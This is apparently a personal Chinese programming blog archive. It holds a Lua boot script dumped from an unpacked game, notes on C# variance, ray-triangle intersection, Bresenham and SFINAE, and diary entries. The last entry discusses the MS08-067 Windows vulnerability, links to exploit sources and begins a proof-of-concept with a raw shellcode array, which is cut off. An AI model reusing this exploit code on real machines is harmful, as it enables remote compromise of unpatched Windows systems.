October 23 脱upx官方壳(作者只是为了压缩),bp CreateFileA,很顺利地摸到了解压函数thmj.exe.0x00419f16,之前在内存分配算法里转了很久。这里是内存dump出来的第一个文件:
--[[
prototype boot.lua
This is the prototype file used when creating a new game with AIMS.
Edit it freely to suit your project.
]]
-------------------------------------------
-- Load common
-------------------------------------------
-- Load every AIMS file with the prequire function.
-- The built-in require also works, but
-- require does not scan inside package files.
prequire("common.lua");
-------------------------------------------
-- Constant initialisation
-------------------------------------------
G = {}; -- graphic handles hang under this table
S = {}; -- sound handles go under this one (likewise)
A = {}; -- handles of actors that must be reachable from everywhere go here
-- Splitting things across tables like this makes life easier in many ways.
-------------------------------------------
-- Load shared functions
-------------------------------------------
-- prequire the functions shared across the game.
prequire("s/game_common.lua");
prequire("s/save.lua");
prequire("s/trans.lua");
prequire("s/socket.lua");
prequire("s/serial.lua");
prequire("s/c_fader.lua");
-------------------------------------------
-- Load game scenes
-------------------------------------------
-- prequire the game's scene scripts.
prequire("s/scene/mouse.lua");
prequire("s/scene/logo.lua");
prequire("s/scene/title.lua");
prequire("s/scene/demonstration.lua");
prequire("s/scene/infomation.lua");
prequire("s/scene/chrselect.lua");
prequire("s/scene/storyselect.lua");
prequire("s/scene/multi.lua");
prequire("s/scene/game.lua");
prequire("s/scene/option.lua");
prequire("s/scene/dialog_serial.lua");
prequire("s/scene/quit.lua");
prequire("s/scene/standby.lua");
prequire("s/scene/replay.lua");
prequire("s/scene/adv.lua");
prequire("s/scene/ending.lua");
prequire("s/scene/gameover.lua");
-- Scenes used with addScene
prequire("s/scene/telop.lua");
prequire("s/scene/network.lua");
prequire("s/scene/submenus.lua");
-- Scene used only in debug mode
if(_DEBUG)then
  prequire("s/scene/testfield.lua");
  _GO_TO_TESTFIELD = false;
end
prequire("s/stats/character.lua");
prequire("s/stats/taku.lua");
prequire("s/stats/achievement.lua");
-- Player action functions
prequire("s/actor/player/ui.lua");
prequire("s/actor/player/IsFuroPlayer.lua");
prequire("s/actor/player/OnChiPlayer.lua");
prequire("s/actor/player/OnAnkanPlayer.lua");
prequire("s/actor/player/OnSutehaiPlayer.lua");
prequire("s/actor/cpu/IsFuroCpu.lua");
prequire("s/actor/cpu/OnChiCpu.lua");
prequire("s/actor/cpu/OnSutehaiCpu.lua");
prequire("s/actor/Network/IsFuroNetwork.lua");
prequire("s/actor/Network/OnSutehaiNetwork.lua");
-- Scripts for the action threads of the main game
prequire("s/algorithm/OnAgari.lua");
prequire("s/algorithm/OnAnkan.lua");
prequire("s/algorithm/OnChi.lua");
prequire("s/algorithm/OnKyusyu.lua");
prequire("s/algorithm/OnMinkan.lua");
prequire("s/algorithm/OnPon.lua");
prequire("s/algorithm/OnRon.lua");
prequire("s/algorithm/OnSutehai.lua");
prequire("s/algorithm/OnTsumo.lua");
-- Assorted in-game helper functions
prequire("s/algorithm/hai_code.lua");
prequire("s/algorithm/bonus_pts.lua");
prequire("s/algorithm/isAnkan.lua");
prequire("s/algorithm/isChi.lua");
prequire("s/algorithm/isMinkan.lua");
prequire("s/algorithm/isPon.lua");
prequire("s/algorithm/isReach.lua");
prequire("s/algorithm/isRon.lua");
prequire("s/algorithm/isYakuhai.lua");
prequire("s/algorithm/isFuro.lua");
prequire("s/algorithm/ShowAgariResult.lua");
prequire("s/algorithm/ShowKyokuResult.lua");
prequire("s/algorithm/ShowEndGameResult.lua");
-- Actor class scripts
prequire("s/actor/hai.lua");
prequire("s/actor/taku.lua");
prequire("s/actor/player.lua");
prequire("s/actor/titles.lua");
prequire("s/actor/effect.lua");
prequire("s/actor/button.lua");
prequire("s/actor/taku_entity/scoreboard.lua");
prequire("s/actor/taku_entity/nameboard.lua");
prequire("s/actor/taku_entity/result_nameboard.lua");
prequire("s/actor/taku_entity/global_status.lua");
-- Sound-related
prequire("s/se.lua");
prequire("s/music.lua");
-------------------------------------------
-- OnLoad: called right after start-up
-------------------------------------------
--- Sets the time locale and window caption, then prepares the spinner graphics.
-- Writes G.__spinnerbase, G.spinner[1] (13 cut frames) and G.spinner[2].
function OnLoad()
  os.setlocale("English_America.932", "time");
  --_dm("os.setlocale;"..tostring( os.setlocale("English_America.932", "time") ) );
  --_dm( "now:"..os.date( "!%a, %d %b %Y %H:%M:%S GMT", 1235706461) );
  setWindowCaption("東方幻想麻雀 - Touhou Unreal Mahjong Ver "..GAME_VER);
  G.__spinnerbase = loadGraphic("gfx/spinner.png");
  G.spinner = {};
  G.spinner[1] = {};
  -- 13 frames of 192x32, stacked vertically in the sheet at y = 32*i.
  for i=0,12 do
    G.spinner[1][i+1] = cutGraphic(G.__spinnerbase,0,32*i,192,32);
  end
  setAllGraphicCenter(G.spinner[1],1,1);
  -- A further 192x32 cut taken from y = 418 of the same sheet.
  G.spinner[2] = cutGraphic(G.__spinnerbase,0,418,192,32);
  setGraphicAnimeLoop(G.spinner[1],4,1);
end
-------------------------------------------
-- OnStart
-------------------------------------------
-- Right after start-up the boot scene is entered.
--- Boot-scene start hook: initialises sound effects, seeds the gv slots on
-- first launch, sets unlock flags, applies the stored volumes, loads the
-- notice graphic and starts boot_thread.
function boot_OnStart()
  cls();
  clearLayerSettings();
  -- Try initialising sound effects
  se_init();
  if(getgv(1,0)==0)then
    -- Looks like the first launch.
    setgv(1,0,1);
    setgv(1,1,3);
    setgv(1,2,5);
    setgv(1,3,0);
  end
  -- Character unlocks
  -- These flags are written on every boot, not only on first launch.
  setgv(1, 101, 1);
  setgv(1, 102, 1);
  setgv(1, 110, 1);
  setgv(1, 113, 1);
  setgv(1, 120, 1);
  setgv(1, 122, 1);
  setgv(1, 130, 1);
  setgv(1, 132, 1);
  setgv(1, 137, 1);
  setgv(1, 152, 1);
  -- Table unlock
  setgv(1, 201, 1);
  -- Debug only: unlock everything in the save data
  --_ALL_ARCHIEVEMENT_UNLOCK = true
  --for i = 100,399 do
  -- setgv(1, i, 1);
  --end
  -- Slots (1,1) and (1,2) hold the stored volume levels, scaled by 10 here.
  setMusicMasterVolume(getgv(1,1)*10);
  setSoundMasterVolume(getgv(1,2)*10);
  savedata_init();
  G.boot = loadGraphic("gfx/title/notice.png");
  startThread("boot_thread");
end
-------------------------------------------
-- OnStep
-------------------------------------------
--- Boot-scene step hook: switches to the "logo" scene once isThreadRunning()
-- reports false (presumably once boot_thread has finished -- confirm).
function boot_OnStep()
  if(not isThreadRunning())then
    changeScene("logo");
  end
end
-------------------------------------------
-- OnClose
-------------------------------------------
--- Boot-scene close hook: clears the screen.
function boot_OnClose()
  cls();
end
--- Thread body started by boot_OnStart: fades the notice graphic in, waits for
-- input or a timeout, runs the music package check, then fades out.
-- Raises an error when the package check fails.
function boot_thread()
  -- NOTE(review): with _DEBUG set this returns at once, so the notice screen
  -- AND the music package check below are both skipped, and G.boot is never
  -- deleted here. Make sure _DEBUG cannot be set in a shipped build.
  if(_DEBUG)then
    return;
  end
  local a = createActor(G.boot,400,300,0);
  addMover(a,-1,1,MOVER_SETCOLOR,0,0,0);
  -- Fade in: colour value goes 15, 31, ... 255 over 16 steps.
  for i=1,16 do
    addMover(a,-1,1,MOVER_SETCOLOR,i*16-1,i*16-1,i*16-1);
    wait(1);
  end
  wait(30);
  -- Hold the notice until a trigger/mouse button is pressed or the loop runs out.
  for i=0,60*8 do
    if( getJoyPressCount(BUTTON_TRIG1)==1 or getJoyPressCount(BUTTON_TRIG2)==1 or getMousePressCount(MOUSE_LEFT)==1 or getMousePressCount(MOUSE_RIGHT)==1 )then
      break;
    end
    wait(1);
  end
  -- Music validity check
  -- NOTE(review): the reference MTIME/MD5 are read from SAVEDATA and, on
  -- success, overwritten with whatever isMusicPackageCheck returns. The helper
  -- is not visible here; if the reference lives only in the local save data,
  -- this detects accidental corruption but is not a tamper-proof integrity
  -- control (MD5 is also not collision-resistant) -- confirm the intent.
  local result, mtime, md5 = isMusicPackageCheck(SAVEDATA.MUSIC_PACKAGE.MTIME, SAVEDATA.MUSIC_PACKAGE.MD5)
  if(result)then
    SAVEDATA.MUSIC_PACKAGE = {
      MTIME = mtime;
      MD5 = md5;
    };
  else
    error("エラー:パッケージファイルが壊れています。");
  end
  -- Fade out: the same ramp in reverse.
  for i=16,1,-1 do
    addMover(a,-1,1,MOVER_SETCOLOR,i*16-1,i*16-1,i*16-1);
    wait(1);
  end
  cls();
  wait(30);
  deleteGraphic(G.boot);
  G.boot=nil;
end
-------------------------------------------
-- OnVanish: called just before the application exits
-------------------------------------------
--- Shutdown hook: when a room is joined (and not in replay mode) it notifies
-- the server that this client is leaving, then deletes the Socket object and
-- releases all graphics and sounds.
function OnVanish()
  if(Socket ~= nil)then
    if(Socket.roomnum ~= nil and not REPLAYMODE)then
      b_HTTPLOCK = false;
      if(bNetwork)then
        -- TODO: cancel the penalty when the game ends via a stop
        -- Runs only when more than 60 seconds have passed since LATEST_TASKTIME
        -- and a personal-data entry exists for the recorded penalty mode.
        if(os.time() - LATEST_TASKTIME > 60 and SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE] ~= nil)then
          if(SAVEDATA.PENALTY_BSCORE==0)then
            SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_n = SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_n -1;
          else
            SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_b = SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_b -1;
          end
          SAVEDATA.PENALTY_SCORE = 0;
          SAVEDATA.PENALTY_PLACE = 0;
          SAVEDATA.PENALTY_MODE = "";
          SAVEDATA.PENALTY_BSCORE = 0;
          save_state();
        end
        -- Leave the match
        -- NOTE(review): the only proof of identity in this request is
        -- md5string(SAVEDATA.PIN), sent next to the room password. An unsalted
        -- MD5 of a PIN is a fixed, replayable value and protects the PIN poorly.
        -- How POSTSend transports it is not visible here -- confirm it is
        -- TLS-protected and consider a server-issued nonce with a keyed MAC.
        local taskdata = {
          seat = tonumber(GLOBAL_VIEW_POINT);
          task = "OnLeave";
          hash = md5string(SAVEDATA.PIN);
        }
        local send = {
          roomnum = Socket.roomnum;
          snum = Socket.snum;
          pass = Socket.roompassword;
          -- serialised task with newlines stripped
          q = string.gsub(serialize(taskdata), "\n", "");
        }
        -- `result` has no `local` in this function, so this writes a global.
        result = POSTSend(send, Socket.script.sendtask);
      else
        -- Leave the room
        local send = {
          roomnum = Socket.roomnum;
          pass = Socket.roompassword;
          -- same PIN digest as above, here wrapped in literal double quotes
          hash = "\""..md5string(SAVEDATA.PIN).."\"";
        };
        result = POSTSend(send, Socket.script.leave);
      end
    end
    Socket:delete();
    Socket = nil;
  end
  printnode(TASK);
  deleteAllGraphic(G); -- delete graphics
  deleteAllSound(S); -- delete sounds
end
September 25 Variance An aspect of generics that often comes across as surprising is that the following is illegal: IList<string> strings = new List<string>(); IList<object> objects = strings; The second assignment is disallowed because strings does not have the same element type as objects. There is a perfectly good reason for this. 
If it were allowed you could write: objects[0] = 5; string s = strings[0]; Allowing an int to be inserted into a list of strings and subsequently extracted as a string. This would be a breach of type safety. However, there are certain interfaces where the above cannot occur, notably where there is no way to insert an object into the collection. Such an interface is IEnumerable<T>. If instead you say: IEnumerable<object> objects = strings; There is no way we can put the wrong kind of thing into strings through objects, because objects doesn’t have a method that takes an element in. Variance is about allowing assignments such as this in cases where it is safe. The result is that a lot of situations that were previously surprising now just work. Covariance In .NET 4.0 the IEnumerable<T> interface will be declared in the following way: public interface IEnumerable<out T> : IEnumerable { IEnumerator<T> GetEnumerator(); } public interface IEnumerator<out T> : IEnumerator { bool MoveNext(); T Current { get; } } The “out” in these declarations signifies that the T can only occur in output position in the interface – the compiler will complain otherwise. In return for this restriction, the interface becomes “covariant” in T, which means that an IEnumerable<A> is considered an IEnumerable<B> if A has a reference conversion to B. As a result, any sequence of strings is also e.g. a sequence of objects. This is useful e.g. in many LINQ methods. Using the declarations above: var result = strings.Union(objects); // succeeds with an IEnumerable<object> This would previously have been disallowed, and you would have had to do some cumbersome wrapping to get the two sequences to have the same element type. Contravariance Type parameters can also have an “in” modifier, restricting them to occur only in input positions. 
An example is IComparer<T>: public interface IComparer<in T> { public int Compare(T left, T right); } The somewhat baffling result is that an IComparer<object> can in fact be considered an IComparer<string>! It makes sense when you think about it: If a comparer can compare any two objects, it can certainly also compare two strings. This property is referred to as contravariance. A generic type can have both in and out modifiers on its type parameters, as is the case with the Func<…> delegate types: public delegate TResult Func<in TArg, out TResult>(TArg arg); Obviously the argument only ever comes in, and the result only ever comes out. Therefore a Func<object,string> can in fact be used as a Func<string,object>. Limitations Variant type parameters can only be declared on interfaces and delegate types, due to a restriction in the CLR. Variance only applies when there is a reference conversion between the type arguments. For instance, an IEnumerable<int> is not an IEnumerable<object> because the conversion from int to object is a boxing conversion, not a reference conversion. Also please note that the CTP does not contain the new versions of the .NET types mentioned above. In order to experiment with variance you have to declare your own variant interfaces and delegate types.
September 09 以下代码摘自本人最自豪的游戏《3D连连看》: PS:如果没有记错的话,这段代码是手抄《Direct3D中实现图元的鼠标拾取》中的代码,核心应该是被我选择性忽略了… GLfloat LLKan::IntersectTriangle(GLfloat x,GLfloat y,GLfloat z,GLfloat wx,GLfloat wy,GLfloat wz,const SHAPE & triangle,const VECTOR position) { 首先是参数说明:前3个浮点数是射线的近截面交点,后3个浮点数是射线的远截面交点,结构SHAPE应该是存储了三角形在自身坐标系的3个vertex,最后的vector是它的世界坐标系坐标。 GLfloat edge1[3]; GLfloat edge2[3]; edge1[0]=triangle.m_pVertexArray[1].position.x-triangle.m_pVertexArray[0].position.x; edge1[1]=triangle.m_pVertexArray[1].position.y-triangle.m_pVertexArray[0].position.y; edge1[2]=triangle.m_pVertexArray[1].position.z-triangle.m_pVertexArray[0].position.z; edge2[0]=triangle.m_pVertexArray[2].position.x-triangle.m_pVertexArray[0].position.x; edge2[1]=triangle.m_pVertexArray[2].position.y-triangle.m_pVertexArray[0].position.y; edge2[2]=triangle.m_pVertexArray[2].position.z-triangle.m_pVertexArray[0].position.z; 这里的edge1和edge2分别放了向量AB和AC。 补充数学知识:三角形的重心坐标系(Barycentric coordinates) 在三角形ΔABC中,P点可以用ABC三点来表示,即P=sA+qB+rC 且s+q+r=1。因为 s+q+r=1,故有s=1-q-r,由此得P(q,r) = (1-q-r)A+qB+rC,化简得P(q,r) = A+(B-A)q+(C-A)r。 其他重心坐标系性质参照:http://en.wikipedia.org/wiki/Barycentric_coordinates_(mathematics) GLfloat dir[3]; dir[0]=wx-x; dir[1]=wy-y; dir[2]=wz-z; GLfloat w = (GLfloat)sqrt((double)pow(dir[0],2.0)+(double)pow(dir[1],2.0)+(double)pow(dir[2],2.0)); dir[0] /= w; dir[1] /= w; dir[2] /= w; 写了一大段废话(其实也不废),就是计算射线的direction向量并归一化。 GLfloat pvec[3]; pvec[0]= dir[1]*edge2[2] - dir[2]*edge2[1]; pvec[1]= dir[2]*edge2[0] - dir[0]*edge2[2]; pvec[2]= dir[0]*edge2[1] - dir[1]*edge2[0]; GLfloat det ; det = edge1[0]*pvec[0]+edge1[1]*pvec[1]+edge1[2]*pvec[2]; GLfloat tvec[3]; if( det > 0 ) { tvec[0] = x - triangle.m_pVertexArray[0].position.x - position.x; tvec[1] = y - triangle.m_pVertexArray[0].position.y - position.y; tvec[2] = z - triangle.m_pVertexArray[0].position.z - position.z; } else { tvec[0] = triangle.m_pVertexArray[0].position.x - x + position.x; tvec[1] = triangle.m_pVertexArray[0].position.y - y + position.y; tvec[2] = 
triangle.m_pVertexArray[0].position.z - z + position.z; det = -det ; } if ( det < 0.0001f ) return -1.0f; 这里的det,恩,其实全称是determinant,是行列式的值。唔,当然一下子说明不了。 补充数学知识第二弹:Cramer法则核心解法 射线方程:Vposition + t * Vdirection; 如果交点在三角形内,那么根据重心坐标系,肯定满足:(1-u-v)Va + u*Vb + v*Vc 整理得:Vposition + t*Vdirection = (1-u-v)Va + u*Vb + v*Vc,即:-Vdirection*t + (Vb-Va)*u + (Vc-Va)*v = Vposition – Va 令e1=Vb-Va, e2=Vc-Va, s=Vposition-Va,d=Vdirection,则根据Cramer法则解方程为: $$\begin{bmatrix} t \\ u \\ v \end{bmatrix} = \frac{1}{\det(-d,\,e_1,\,e_2)} \begin{bmatrix} \det(s,\,e_1,\,e_2) \\ \det(-d,\,s,\,e_2) \\ \det(-d,\,e_1,\,s) \end{bmatrix}$$ 根据线性代数,det(A,B,C)=|A B C|=-(AxC)·B=-(CxB)·A(根据个鬼) $$\begin{bmatrix} t \\ u \\ v \end{bmatrix} = \frac{1}{(d \times e_2)\cdot e_1} \begin{bmatrix} (s \times e_1)\cdot e_2 \\ (d \times e_2)\cdot s \\ (s \times e_1)\cdot d \end{bmatrix}$$ 根据程序,pvec就是(dxe2),tvec就是s,qvec就是(sxe1) 详细参考《Real-time Rendering 2nd》,P578 GLfloat u ; u = tvec[0]*pvec[0]+ tvec[1]*pvec[1]+ tvec[2]*pvec[2]; if( u < 0.0f || u > det ) return -1.0f; GLfloat qvec[3]; qvec[0]= tvec[1]*edge1[2] - tvec[2]*edge1[1]; qvec[1]= tvec[2]*edge1[0] - tvec[0]*edge1[2]; qvec[2]= tvec[0]*edge1[1] - tvec[1]*edge1[0]; GLfloat v; v = dir[0]*qvec[0]+dir[1]*qvec[1]+dir[2]*qvec[2]; if( v < 0.0f || u + v > det ) return -1.0f; GLfloat t = edge2[0]*qvec[0]+edge2[1]*qvec[1]+edge2[2]*qvec[2]; GLfloat fInvDet = 1.0f / det; t *= fInvDet; u *= fInvDet; v *= fInvDet; return t; } September 08 前记:初次在网上找到的讲解居然是转载http://cg.sjtu.edu.cn,我们交大果然nb啊~ 一句话原理: 由直线的斜率确定选择在x方向或y方向上每次递增(减)1个单位,另一变量的递增(减)量为0或1,它取决于实际直线与最近光栅网格点的距离,这个距离的最大误差为0.5。
0<=d<=1 当d<0.5:下一个象素应取右光栅点(xi+1,yi) 当d>0.5:下一个象素应取右上光栅点(xi+1,yi+1)
令e=d-0.5,关于d的判别式和初值可简化成: e的初值e0= -0.5,增量亦为k; e<0时,取当前象素(xi,yi)的右方象素(xi+1,yi); e>0时,取当前象素(xi,yi)的右上方象素(xi+1,yi+1); e=0时,可任取上、下光栅点显示。 上述Bresenham算法在计算直线斜率和误差项时要用到浮点运算和除法,采用整数算术运算和避免除法可以加快算法的速度。 NError=2*Error*∆x 要使第一个八卦的Bresenham算法适用于一般直线,只需对以下2点作出改造: 当直线的斜率|k|>1时,改成y的增量总是1,再用Bresenham误差判别式确定x变量是否需要增加1; x或y的增量可能是“+1”或“-1”,视直线所在的象限决定。 //Bresenham's integer line resterization algorithm for all quadrnts //The line end points are (xs,ys) and (xe,ye) assumed not equal. All variables are assumed integer. //initialize variables x=xs y=ys ∆x = abs(xe -xs) //∆x = xe -xs ∆y = abs(ye -ys) //∆y = ye -ys sx = isign(xe -xs) sy = isign(ye -ys) //Swap ∆x and ∆y depending on the slope of the line. if ∆y>∆x then Swap(∆x,∆y) Flag=1 else Flag=0 end if //initialize the error term to compensate for a nonezero intercept NError =2*∆y-∆x //begin the main loop for i=1 to ∆x WritePixel(x, y , value) if (Nerror>=0) then if (Flag) then //∆y>∆x,Y=Y+1 x=x+sx else y=y+sy end if // End of Flag NError = NError –2*∆x end if // End of Nerror if (Flag) then //∆y>∆x,X=X+1 y=y+sy else x=x+sx end if NError = NError +2*∆y next i finish 原文地址: http://cg.sjtu.edu.cn/lecture_site/chap2/mainframe212.htm August 07 早上上班的时候,匆忙间下楼的时候没顺手抄起交通卡,然后让老爸从楼上扔下来的时候摔碎了一起夹住的晾衣架子开始,我的厄运就此开始。中午打dota由于实力不均,我索性玩起炸弹人,不过也许是很久没玩的原因,自爆没爆死过人。虽然是胜利了,但是却打得极其不爽。晚上做版本,老大不走我也不敢走哪,结果拖着拖着就七点半去了。回到家没钥匙,去老妈公司找人却遇到个极其SB的门卫,加上那间SB公司管理极其混乱,找个人都找不到。接着找了叫小饭馆吃饭,菜上上来才发现是湘菜,辣死,光喝汤了。本来计划请初中同学吃宵夜的,怎么说也顺利换了个工作,结果加班的加班,泡妞的泡妞,失踪的失踪,于是作罢。思索着如何打发时间,跑来跑去连个有空调的地方都没有,哦,当然168和上岛咖啡还是有的,再稍微平民一点的KFC啥的影子都没。路上经过一家街客,结果100块票子找回来7张10,1张20,3个1,1个0.5,5个0.1。再走着走着突然就下雨了,幸好带着伞。雨停了,找了家街边摊吃烤肉,结果烤到一半又下雨了,只能和着雨水吃了。最后回到家发现卡巴被封key。 August 06 Substitution Failure Is Not an Error!
#include <iostream>
using namespace std;
// Non-template overload taking an int. It prints a fixed marker line so the
// demo shows which overload the call resolved to; the argument value itself
// is not used.
void foo(int iNum)
{
    static_cast<void>(iNum);  // only the argument's type matters here
    std::cout << "int print( int )";
    std::cout << std::endl;
}
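// Overload that takes part in overload resolution only when T has a nested
// `value_type` (a standard container, for example). For a T without one,
// forming `typename T::value_type*` fails during template argument
// substitution and this overload is silently discarded instead of causing a
// compile error (SFINAE).
//
// tt         - the value whose type selects the overload; not otherwise used.
// pvt_dummy  - never read; exists only so that T::value_type appears in the
//              signature, and defaults to NULL so callers pass one argument.
template <typename T>
void foo(T tt, typename T::value_type* pvt_dummy = NULL)
{
    // The local must be declared through T, the parameter this template
    // actually declares; an undeclared name in this position is rejected at
    // definition time by compilers that implement two-phase lookup.
    typename T::value_type vt_someval;
    static_cast<void>(tt);
    static_cast<void>(pvt_dummy);
    static_cast<void>(vt_someval);
    std::cout << "template < typename _Ty >" << std::endl;
}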
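// Entry point of the demo. `short` has no nested value_type, so the template
// overload of foo is discarded during substitution and the call resolves to
// foo(int) after integral promotion.
// Declared as `int main()`: standard C++ requires main to return int.
int main()
{
    short siNum = 10;
    foo(siNum);
    return 0;
}
June 02 偶还是个有故事的人那… 还需要继续整理,修改一些Tag,基本打算整理到2007年7月为止,顺便把校内值得记录得给挪过来。 为什么过了一年才写,因为我想我可以客观地评价一些人一些事。如果说这四年最后悔的,是从大二大作业开始到大三大作业开始这整整一年的自暴自弃。绩点,编程,在时间轴上保持平行,唯一的慰藉是dota的前八吧……什么练习dota,什么ACG,我只是为怕在教室里见到她和他找借口而已,所以我只不过是因为失恋自己毁了自己的读研路或者其他机会的失败者而已,以此为鉴,走好sjtu外的每一步! 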
阳光上限是9990,最上排和最下排的西瓜应该换成煤气,不然中路的玉米大炮极容易被破,破一个少1k,即使是满阳光也会瞬间破产。钉子便宜耐用,应该放两排。我35+的时候,水路被破,加上中间层的玉米大炮消耗过大,结果死在40波上。另外,我在水中放了只猫,效果不入风车,可惜风车没看过来,不小心掉了一辆车…水路的6只煤球应该是最强了…打完发现钱10w+了…花园位置不够了,卖掉了些重复的…
 
May 17 今天一大早赶到国泰电影院看《星际迷航》,下午去搞了RP机,然后紧接着就去上新世界日语,回来的时候还淋了一身雨,晚上试了下480的效果,果然很惨,画面变形,字貌似也很难看清楚,不过对街霸影响不大... April 25 总结一下,刚上手的时候第一版卡了一会儿,后来基本上都轻松解决。然后网上看剧情的时候才发现还要拿星星,于是进入二周目。调教兔子那段比较麻烦,还有2-2的云彩我用10fps+变速齿轮256倍等了10多分钟吧。最后公主那段比较囧,跳了三次才跳上去,还是我换成键盘操作的,不过倒是真的看到公主爆炸了…恩,for memory,上图。
April 22 台版的翻译不错,一晚上干掉了两个半world,其中两处看了攻略Q_Q几个gameplay,带绿光的是不受时间反转影响的,拼图可以利用 April 06 1.系统必备
CeleDial by yonsm
二、特点
- 迅捷易用:无缝集成到拨号界面,使用电话程序中的 T9 屏幕键盘,简单易用;内存占用极少,运行飞快。
- 智能匹配:支持通过姓名、拼音、简拼和电话号码智能查找联系人;支持所有 Unicode 中文汉字拼音。
- 码表定制:内置支持简体拼音、通用拼音、注音符号方式搜索联系人,可以通过外置码表支持其它查询方式。
- 定制命令:用户可定制的快捷菜单,支持自定义命令扩展,可应用于IP电话、视频拨号等其它扩展应用。
- 广泛支持:支持读取内置联系人、SIM 卡联系人和通话记录电话号码作为 CeleDial 联系人条目。
- 完美兼容:支持 Windows Mobile 5.0/6.0/2003 Pocket PC Phone,支持 QVGA、VGA 和正方形屏幕 。
超小的体积,实用的快速拨号功能,如上所示,99代表zy,当然重码很厉害,也可以这样:
不过打那么数字不如直接去联系人里面找呢... April 02 版权物,如有侵犯某人肖像权再说…
January 17 WOW手机客户端,WOW可不是山口山啊,名字好像是在轮子上的餐馆。简单来说,就是订餐系统手机客户端罢了。原先我的设想是做可离线式富客户端,当然在第一步选择平台上就错误了。现在想起来主要原因在于我那时候还在用那个三星X108,所以选择了J2ME CLDC平台。如今,塞班、Windows Mobile、谷歌Android还有Mac OSX,这些才是真正的操作系统啊。不过,当时的NetBeans对J2ME的支持已经相当完美了,难产的元凶在于数据库,因为当时比较成熟的PointBase Micro正好挂掉,直接导致CLDC平台上没有比较完善的RDBMS。当然,完美主义的我是不屑J2ME原生的RMS的。(其实那个是可以勉为其难做数据backend的。)一直苦于找不到合适的数据解决方案,让我放弃了。其实,事实上让我放弃的理由很多,比如没有联系到外组合作,说到底,手机客户端靠我一个人还是比较吃力的事情。其次就是没有人支持,话说,根本没人关心的项目实施起来的确比较冷。后来也考虑过重拾BabyRMS,就是所谓的RMS的SQL89 Adapter,不过意义实在不大,在稍微浏览了下SQLite的源代码后正式放弃了。至此,所有相关物全部束之高阁。 November 30 缘起应该是大四沈备军课上停摆的网上订餐系统的手持设备用嵌入式数据库,因为种种原因胎死腹中. 这次重拾也一方面因为Pointbase数据库给IBM吞掉导致没什么顺手来支持CLDC. 基本设想是SQLite3的Port,做支持SQL92的RDBMS,base在CLDC的RMS存储系统之上. 扩展是同外部数据库同步,暂时并没有打算做这个feature. 现在的Plan为: 1.通读SQLite源代码,应该2M的代码还是能啃下来的. 2.做可行性分析,再制订下一步计划. November 23 1.QQ的QQ秀合影功能能让你快速定位对方是否加你为好友. 2.MSN->Tools->Privacy->Contact lists可以让你快速定位对方是否加你为好友. 知道了又如何,这些虚拟的好友关系存在与否有什么关系? 4年的单恋,7年的友谊,值多少? RESET自己,既然自己有能力知道真相,那就不用再自己骗自己了. November 09 首先注意到无论是PPC端还是Java端,飞信的客户端都不需要输入密码,但是能否利用这一点来登陆他人飞信呢? 很奇怪的是QQ和MSN都有Wifi版本而飞信却迟迟没有Wifi版本出现,当然和这个东西刚开发出来,协议也不是非常透明有关,我的意思是除了libfetion以外,其实我觉得libfetion可以用原fetion的GUI做wrapper上去,没仔细研究过也不妄加评论.事实上,我大概查了一下WAP应用,应该是Server端才得到你的手机号码,然后返回一个cookie作为验证子,所以要欺骗手机号基本上就是要欺骗WAP协议了.因此可以看出,飞信设计的时候就没考虑到Wifi,是故意为之呢还是开发人员脑残... 我的第一部手机是索爱T628,没入手多久就被盗,可以忽略. 我的第二部手机是三星X108,SYSOL系统,非智能操作系统,也是我第一个接触到的刷机平台,留下来比较有用的工具就是Downloader刷机软件了.值得一提的是,该操作系统分为两个部分,一个部分貌似是资源可以随便改,还有一个是操作系统核心,可以在空心段刷入铃声然后改内置铃声的偏移从而达到修改短信铃的目的...可惜没有指令集资料没有反汇编引擎,玩这些根本没有生产力,故放弃. 我的第三部手机是多普达P800W,WM5.0系统,暂时没兴趣刷机,ARM处理器,不过仍旧没找到什么反汇编引擎,基于二进制的刷机在我现在看来完全不可信.主要拿来玩玩.NET CF还是不错的.或者现在的我已经厌倦了C这种中级语言了?! 我(爸)的第四部手机是山寨机,MTK6227系统,暂时不想废米买刷机设备,ARM7处理器,应该能找到反汇编器和设计图纸什么的,不过实在对这个东西没有爱,也没精力,故放弃. 
October 30 Microsoft的公告: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 首个POC http://www.milw0rm.com/exploits/6824 Ph4nt0m的利用代码 http://bbs.ph4nt0m.org/ EMM的主要思路就是利用 NetpwNameCompare((wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89",(wchar_t *)"\x4D\x00\x56\x89\x56\x89",4,0); 该函数在堆栈内的残像制造0x5C字符 当前MS08-067的缺憾: 1. IPC$通道虽然为默认开启,但是一般被防火墙所屏蔽 2. svchost在XPSP2系统中默认受DEP数据执行保护 比较赞的分析: http://www.phreedom.org/blog/2008/decompiling-ms08-067/ http://bbs.pediy.com/showthread.php?t=75361 http://hi.baidu.com/aullik5/blog/item/2f00483782bbd8dba3cc2b41.html 附上比较丑陋的MS08067 ver.xiaoxue: #include <stdio.h> #include <windows.h> #include "SRVSVC_h.h" #pragma comment(lib, "rpcrt4") unsigned char ShellCode[] = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x78\x75\x65\x20\x68\x78\x69\x61\x6F\x8B\xC4\x53\x50\x50" 